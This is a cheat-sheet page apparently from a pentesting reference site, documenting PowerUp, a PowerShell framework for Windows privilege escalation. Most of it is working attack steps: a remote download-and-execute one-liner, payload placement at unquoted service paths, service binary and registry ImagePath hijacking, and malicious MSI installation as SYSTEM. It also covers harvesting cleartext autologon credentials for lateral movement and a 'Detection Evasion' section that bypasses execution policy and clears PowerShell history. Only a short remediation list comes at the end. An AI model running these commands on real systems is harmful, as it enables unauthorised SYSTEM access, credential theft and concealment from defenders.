Zum Inhalt springen
1337skills 1337skills - Referenzen

Powerup

PowerUp is a PowerShell framework for comprehensive Windows privilege escalation vector discovery and exploitation.

Installation

# Download and load into memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1')

# Or download and dot-source
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1 -O PowerUp.ps1
. .\PowerUp.ps1

Basic Usage

CommandDescription
Invoke-AllChecksRun all privilege escalation checks
Get-UnquotedServiceFind unquoted service paths
Get-ModifiableServiceFind writable service executables
Get-RegistryAlwaysInstallElevatedCheck AlwaysInstallElevated policy
Get-RegistryAutoLogonRetrieve autologon credentials
Invoke-BypassUACBypass User Account Control
Invoke-ServiceAbuseExploit service misconfigurations

Detailed Function Reference

Invoke-AllChecks

# Run comprehensive privilege escalation assessment
Invoke-AllChecks

# Output includes:
# - Unquoted service paths
# - Modifiable service binaries
# - Weak registry permissions
# - Always install elevated checks
# - Autologon credentials
# - Service abuse opportunities

Get-UnquotedService

# Find services with unquoted paths containing spaces
Get-UnquotedService

# Example vulnerable output:
# ServiceName    : VulnerableService
# Path           : C:\Program Files\Vulnerable Program\service.exe
# ModifiablePath : C:\Program.exe
# Exploitable    : True

Get-ModifiableService

# Find service binaries that current user can modify
Get-ModifiableService

# Allows DLL injection or binary replacement
# Check if binary path is in a writable directory

Get-ModifiableServiceFile

# Check specific service file permissions
Get-ModifiableServiceFile -ServiceName "ServiceName"

# Returns TRUE if user has write/modify permissions

Get-RegistryAlwaysInstallElevated

# Check if MSI packages install with elevated privileges
Get-RegistryAlwaysInstallElevated

# If True + current user is in local admin group:
# Can craft malicious MSI and install as SYSTEM

Get-RegistryAutoLogon

# Extract saved autologon credentials
Get-RegistryAutoLogon

# Returns:
# - Username
# - Domain
# - Password (cleartext in registry)

Get-ModifiableRegistryPath

# Find writable registry paths
Get-ModifiableRegistryPath

# Useful for:
# - Persistence mechanisms
# - Modifying service configurations
# - Changing Run registry entries

Get-RegistryMountedDrive

# Check for mounted network drives with credentials
Get-RegistryMountedDrive

# Credentials stored for future mounting

Get-DomainGroupMember

# List members of domain groups
Get-DomainGroupMember -GroupName "Administrators"

# Identify privileged users for targeting

Unquoted Service Path Exploitation

Identifying the Vulnerability

Get-UnquotedService | Where-Object {$_.Exploitable -eq $true}

# Output:
# ServiceName: VulnService
# Path: C:\Program Files\Vulnerable App\service.exe
# Exploitable: True
# CanRestart: True

Exploitation Steps

# 1. Check if directory is writable
Test-Path "C:\Program Files\Vulnerable App" -PathType Container
Get-Acl "C:\Program Files\Vulnerable App"

# 2. Create payload (must maintain service interface)
# In this case, payload would be "C:\Program.exe"
# Service tries to run: C:\Program Files\Vulnerable App\service.exe
# But finds C:\Program.exe first in search order

# 3. Place payload at priority path
Copy-Item "malicious.exe" "C:\Program.exe"

# 4. Restart service (may require admin or wait for scheduled restart)
Restart-Service "VulnService" -Force

# 5. Verify execution (malicious.exe runs as SYSTEM)

Always Install Elevated Exploitation

# Check if vulnerable
Get-RegistryAlwaysInstallElevated

# If returns True:
# 1. Create malicious MSI package
# 2. Install silently:
msiexec /i payload.msi /qb /log output.txt

# Executes with SYSTEM privileges regardless of user

Autologon Credential Extraction

Get-RegistryAutoLogon

# Returns cleartext credentials stored in:
# HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
# - DefaultUsername
# - DefaultPassword
# - DefaultDomainName

# Can use credentials for lateral movement or further escalation

Service Abuse Patterns

Service Binary Replacement

# If service binary is modifiable:
# 1. Backup original
Copy-Item "C:\Path\Service.exe" "C:\Path\Service.exe.bak"

# 2. Replace with payload
Copy-Item "payload.exe" "C:\Path\Service.exe"

# 3. Restart service
Restart-Service "ServiceName" -Force

Service Registry Modification

# If service registry path is writable:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\ServiceName" /v ImagePath /t REG_SZ /d "C:\payload.exe" /f

# Next service restart executes payload as SYSTEM

Service Permissions Abuse

# If current user can start/stop service:
# 1. Identify service executable path
# 2. Check if path is writable
# 3. Replace executable or inject DLL
# 4. Start service with new payload
Start-Service "ServiceName"

Token Impersonation (Rotten Potato)

# Check for impersonation privileges
whoami /priv | findstr "ImpersonateUser"

# If SeImpersonatePrivilege present:
# Use Rotten Potato/Golden Potato exploit
# github.com/ohpe/juicy-potato

# JuicyPotato.exe -l 1337 -p C:\payload.exe

Privilege Escalation Chain Example

# 1. Enumerate all opportunities
Invoke-AllChecks

# 2. Identify unquoted service path
$VulnService = Get-UnquotedService | Where-Object {$_.Exploitable}

# 3. Check if directory is writable
$Dir = Split-Path $VulnService.Path
Test-Path $Dir -PathType Container
Get-Acl $Dir | Format-List

# 4. If writable, place payload at exploitable location
Copy-Item "shell.exe" "C:\Program.exe"

# 5. Restart service
Restart-Service $VulnService.ServiceName -Force

# 6. Verify elevation (shell.exe now runs as SYSTEM)

Advanced Usage

Automated Exploitation

# Run all checks and attempt basic exploits
Invoke-PrivEsc

# Attempts:
# - Unquoted service path exploitation
# - AlwaysInstallElevated exploitation
# - Registry modification

Specific Vulnerability Checks

# Check specific vulnerability types
Get-ModifiableService
Get-ModifiableServiceFile
Get-UnattendedInstallFile
Get-WebConfig
Get-ApplicationHost

Credential Harvesting

# Extract various credential sources
Get-RegistryAutoLogon
Get-ApplicationHost
Get-UnattendedInstallFile
Get-WebConfig
Get-CachedRDPTicket

Detection Evasion

# Run in constrained language mode
powershell -ExecutionPolicy Bypass -NoProfile -Command "& {IEX(New-Object Net.WebClient).DownloadString('https://...')}"

# Obfuscate script names
Set-Alias -Name "Check-PrivEsc" -Value "Invoke-AllChecks"

# Clear PowerShell history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath

Remediation

  • Fix unquoted service paths (add quotes)
  • Apply restrictive service DACLs
  • Disable AlwaysInstallElevated
  • Audit and disable autologon
  • Apply all Windows patches
  • Implement UAC properly
  • Regular privilege audits
  • Seatbelt: .NET-based enumeration
  • winPEAS: General Windows enumeration
  • Rubeus: Kerberos exploitation
  • SharpUp: C# port of PowerUp
  • JuicyPotato: Token impersonation exploit

Last updated: March 2025 | GitHub